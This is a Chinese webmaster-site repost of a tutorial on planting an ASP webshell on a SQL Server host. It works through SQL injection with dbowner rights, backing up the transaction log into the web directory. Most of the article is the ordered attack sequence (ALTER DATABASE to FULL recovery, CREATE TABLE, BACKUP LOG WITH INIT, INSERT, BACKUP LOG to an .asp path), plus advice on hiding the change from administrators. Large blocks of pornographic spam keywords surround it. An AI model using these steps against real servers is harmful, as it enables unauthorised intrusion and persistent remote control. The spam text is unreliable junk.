亚洲国产精品人久久,亚洲va国产日韩欧美精品色婷婷,久久久久88色偷偷,免费人成黄页在线观看国际

17站長網

17站長網 首頁 安全 安全教程 查看內容

利用Log備份獲取Webshell的技巧!

2022-9-24 13:05| 查看: 2960 |來源: 互聯網

dbowner通過注射得到一個shell應該不是什么難事情了,比較麻煩的是就算利用增量備份,仍然有很多不確定的因素,如果之前別人有過什么錯誤的寫入信息,可能備份出來得到的還是一些不能用的500錯誤,如何能夠提高成功
dbowner通過注射得到一個shell應該不是什么難事情了,比較麻煩的是就算利用增量備份,仍然有很多不確定的因素,如果之前別人有過什么錯誤的寫入信息,可能備份出來得到的還是一些不能用的500錯誤,如何能夠提高成功率及重用性呢?如果單從調整增量備份的方式來看,盡管能夠達到一些效果,但是方法比較復雜而且效果不明顯。加上關于重用性的考慮,例如多次備份的成功率,backup database的方法并不太適用。這里將要講述的是另外一個備份的方法,導出日志文件到web目錄來獲得shell。

飯要一口一口的吃,技術問題也要一個一個的解決,得到webshell首先要知道物理路徑,然后才能說其他的。關于物理路徑的暴露有很多方法,注入也可以得到,這點nbsi2已經做到了,就不再多說。值得注意的是,如果數據庫和web分離,這樣肯定得不到webshell,備份出來的東西可以覆蓋任何文件,一些關于開始菜單的想法還是有效的,只要注意擴展名就好。扯遠了,反正如果數據庫和web在一塊的,你就有機會,反之還是想其他的辦法吧。

然后你要得到當前的權限和數據庫名。如果是sysadmin當然沒有必要做很復雜的事情,dbowner足矣,public則不行。當前打開的庫名用一個db_name()就可以得到,同樣很簡單。

默認的情況是,一般選擇的數據庫故障還原類型都是簡單,這時候不能夠對日志文件進行備份。然而我們都是dbowner了,還有什么不能做的呢,只要修改一下屬性就可以。由于不能去企業管理器中修改,只有用一段SQL語句,很簡單的,這樣就可以:

alter database XXXX set RECOVERY FULL

其中XXXX是你得到的數據庫的名字,執行過后就可以備份日志了。這種修改是破壞性的,因為你不知道以前的故障還原模式是什么,細心的管理員看到異樣,可能就要開始起疑心。如果之前你能得到數據庫的狀態,最好還是在備份完以后把這個數據庫的屬性改回來。

剩下的事情就是怎樣讓數據庫用最原始的方式記錄下你的數據了。這一點和backup database中設定表名為image的問題相對應,如果你只是建立一個之類的表,日志里面的記錄還是以松散的格式記錄的,也就是< % % >,沒有任何效果。通過實際的測試,發現還是可以通過與backup database類似的方式記錄進去,如下:

  create table cmd (a image)

  insert into cmd (a) values (’’)

  backup log XXXX to disk = ’c:\xxx\2.asp’

這樣你已經得到一個webshell了。

到這里就完了么?沒有,呵呵,我們繼續。

到這里有兩個分支方向,第一個,讓注入的時候不出現單引號,太簡單了,我都懶得寫;第二個,減小這個webshell的長度以及提高成功率。下面的方法就是討論第二個分支問題的,同樣適用于backup database的減小。

首先是初始化這個日志。

  backup log XXXX to disk = ’c:\caonima’ with init

這樣有點類似于增量備份的第一步,不過有點不同的是,你做了這個以后,你備份出來的可用的shell是固定的。這一點比較重要,因為有了這一步,不管管理員在數據庫里面做了什么擾亂你back database的手腳,或者你之前有多少混蛋(你肯定會這么想的)弄了些你不喜歡的東西,都沒有關系,甚至你做過以后,別人在后面再按照你的方法來一次,還是會成功,這對于偶爾出現的反復,比如對方機器重裝但是數據庫和代碼沒變,有不小的幫助。

然后是調整一下backup中各個語句的順序。通過第一點,大概的步驟已經確定下來了,那就是:

  alter database XXXX set RECOVERY FULL

  backup log XXXX to disk = ’c:\Sammy’ with init

  create table cmd (a image)

  insert into cmd (a) values (’’)

  backup log XXXX to disk = ’c:\xxx\2.asp’

這樣不好,感覺上多了一條沒用的東西。

  create table cmd (a image)

確實有點討厭,不過這句是必要的,只好調整一下位置,弄到其他地方去。

調換一下順序似乎還可以小一點,對于backup database中的增量情況同樣是可以的,backup database甚至可以僅僅在update后馬上備份,不過由于涉及到了數據的存儲格式,情況很復雜,這里不討論。調整后的是:

  alter database XXXX set RECOVERY FULL

  create table cmd (a image)

  backup log XXXX to disk = ’c:\Sammy’ with init

  insert into cmd (a) values (’’)

  backup log XXXX to disk = ’c:\xxx\2.asp’


成功的話,備份出來的shell(上面的2.asp)有78.5k,文件長度固定的是80,384字節。很挑剔的朋友也可以接受了吧,當然用這個來生成一個干凈的木馬也可以——這本來就是頂端cs木馬的s端,很通用的。

本文最后更新于 2022-9-24 13:05,某些文章具有時效性,若有錯誤或已失效,請在網站留言或聯系站長:17tui@17tui.com
·END·
站長網微信號:w17tui,關注站長、創業、關注互聯網人 - 互聯網創業者營銷服務中心

免責聲明:本站部分文章和圖片均來自用戶投稿和網絡收集,旨在傳播知識,文章和圖片版權歸原作者及原出處所有,僅供學習與參考,請勿用于商業用途,如果損害了您的權利,請聯系我們及時修正或刪除。謝謝!

17站長網微信二維碼

始終以前瞻性的眼光聚焦站長、創業、互聯網等領域,為您提供最新最全的互聯網資訊,幫助站長轉型升級,為互聯網創業者提供更加優質的創業信息和品牌營銷服務,與站長一起進步!讓互聯網創業者不再孤獨!

掃一掃,關注站長網微信

大家都在看

    熱門排行

      最近更新

        返回頂部
        亚洲国产精品人久久,亚洲va国产日韩欧美精品色婷婷,久久久久88色偷偷,免费人成黄页在线观看国际
        欧美日韩免费观看一区三区| 亚洲综合一二区| 色综合久久中文综合久久97| 国产一区视频导航| 日韩国产欧美三级| 视频一区二区三区在线| 亚洲国产成人va在线观看天堂| 亚洲欧美日韩国产另类专区 | 成人一区在线看| 国产精品一区二区免费不卡| 懂色av一区二区三区免费看| 91亚洲国产成人精品一区二三| 北条麻妃国产九九精品视频| 色丁香久综合在线久综合在线观看| 91免费看视频| 日韩美一区二区三区| 欧美xxxxxxxx| 亚洲美女在线一区| 精品一区二区在线播放| 成人开心网精品视频| 欧美视频中文字幕| 欧美精品一区二区三区蜜臀| 亚洲欧美日韩中文字幕一区二区三区| 亚洲一二三专区| 精品一区免费av| 色婷婷综合久久久| 日韩一区二区免费在线电影| 中文久久乱码一区二区| 午夜成人免费电影| 不卡av电影在线播放| 宅男噜噜噜66一区二区66| 中文字幕免费一区| 日韩国产在线一| 成人avav影音| 久久新电视剧免费观看| 性做久久久久久免费观看| 成人黄色电影在线| 欧美精品一区二区三区蜜桃视频 | 国产婷婷精品av在线| 亚洲国产色一区| av网站免费线看精品| 欧美不卡视频一区| 日韩国产在线观看一区| 91传媒视频在线播放| 国产精品日产欧美久久久久| 久久爱www久久做| 欧美日韩国产小视频| 亚洲欧美日韩在线播放| 成人激情免费电影网址| 国产亚洲一本大道中文在线| 男男视频亚洲欧美| 欧美人牲a欧美精品| 亚洲观看高清完整版在线观看 | 欧美日韩在线综合| 一区二区国产视频| 欧美性受xxxx黑人xyx| 亚洲天堂2016| 色婷婷精品久久二区二区蜜臀av| 久久精品亚洲乱码伦伦中文| 国内外成人在线视频| 久久先锋影音av| 从欧美一区二区三区| 国产精品看片你懂得| 粉嫩欧美一区二区三区高清影视 | av资源网一区| 亚洲欧美色一区| 欧美色图免费看| 奇米四色…亚洲| 久久久www成人免费无遮挡大片| 美女视频网站黄色亚洲| 久久婷婷综合激情| www.综合网.com| 亚洲国产精品视频| 欧美不卡在线视频| 成人动漫一区二区| 亚洲国产精品自拍| www国产亚洲精品久久麻豆| 国产成人午夜精品5599 | 国产精品国产三级国产普通话蜜臀| 国产成人精品三级| 一区二区三区小说| 精品国产一区二区精华| gogogo免费视频观看亚洲一| 亚欧色一区w666天堂| 亚洲视频每日更新| 成人在线视频一区| 亚洲成a人在线观看| 337p粉嫩大胆噜噜噜噜噜91av | 色哟哟在线观看一区二区三区| 亚洲一区在线视频| 久久视频一区二区| 欧美日韩国产精品成人| 高清日韩电视剧大全免费| 亚洲第四色夜色| 国产精品高潮呻吟| 亚洲精品一区二区三区99| 99久久伊人精品| 激情综合色综合久久| 亚洲激情图片qvod| 中文字幕欧美国产| 久久久综合激的五月天| 欧美日韩一区视频| 99re免费视频精品全部| 国产乱子轮精品视频| 美日韩一区二区| 爽好久久久欧美精品| 亚洲男人的天堂在线观看| 国产校园另类小说区| 日韩欧美一区在线| 9191国产精品| 欧美精品tushy高清| 在线观看av一区| 欧美午夜电影在线播放| 91国产精品成人| 欧美性猛交一区二区三区精品| 国产白丝精品91爽爽久久| 国产一区二区三区综合| 精品一区二区在线观看| 久久99国产精品成人| 黑人巨大精品欧美一区| 极品美女销魂一区二区三区 | 国产一区在线观看麻豆| 久久激情综合网| 蜜桃一区二区三区在线| 精品在线观看视频| 国产精品综合在线视频| 激情六月婷婷综合| 国产大陆亚洲精品国产| 成人一区二区三区| 91在线视频网址| 色吊一区二区三区| 日韩视频免费观看高清完整版| 欧美sm极限捆绑bd| 欧美激情在线观看视频免费| 亚洲国产精品成人综合| 亚洲欧美福利一区二区| 亚洲高清视频在线| 久久se这里有精品| av电影天堂一区二区在线| 在线观看日韩av先锋影音电影院| 欧美日韩中文一区| 精品国产乱码久久久久久久| 国产日产精品一区| 亚洲午夜久久久久久久久电影网| 日本不卡不码高清免费观看| 国产精品亚洲成人| 欧美午夜精品久久久久久孕妇| 日韩免费电影一区| 亚洲综合男人的天堂| 乱中年女人伦av一区二区| jvid福利写真一区二区三区| 5858s免费视频成人| 国产精品久久久一区麻豆最新章节| 亚洲狠狠丁香婷婷综合久久久| 人人狠狠综合久久亚洲| 91在线精品秘密一区二区| 日韩女优制服丝袜电影| 亚洲色图19p| 激情六月婷婷久久| 91精品国产综合久久蜜臀| 综合欧美亚洲日本| 久久国产综合精品| 91久久久免费一区二区| 日韩精品资源二区在线| 不卡一区二区三区四区| 国产盗摄视频一区二区三区| 91精品国产品国语在线不卡| 国产精品国产三级国产aⅴ原创 | 综合精品久久久| 国模少妇一区二区三区| 91久久免费观看| 一区2区3区在线看| 91在线国产福利| 亚洲欧洲精品成人久久奇米网 | 日本va欧美va瓶| 欧美影院精品一区| 亚洲r级在线视频| 欧美在线观看禁18| 亚洲综合无码一区二区| 色婷婷综合久久久中文字幕| 专区另类欧美日韩| 91影院在线免费观看| 中文字幕一区av| 色综合久久66| 亚洲午夜久久久久中文字幕久| 色视频一区二区| 亚欧色一区w666天堂| 91麻豆精品国产| 日本麻豆一区二区三区视频| 欧美美女一区二区在线观看| 亚洲国产欧美另类丝袜| 91精品国产综合久久蜜臀| 狂野欧美性猛交blacked| 欧美成人精品1314www| 国产乱人伦偷精品视频不卡| 中文字幕不卡的av| 99re热这里只有精品视频| 亚洲激情图片一区| 精品三级av在线| 97精品久久久久中文字幕|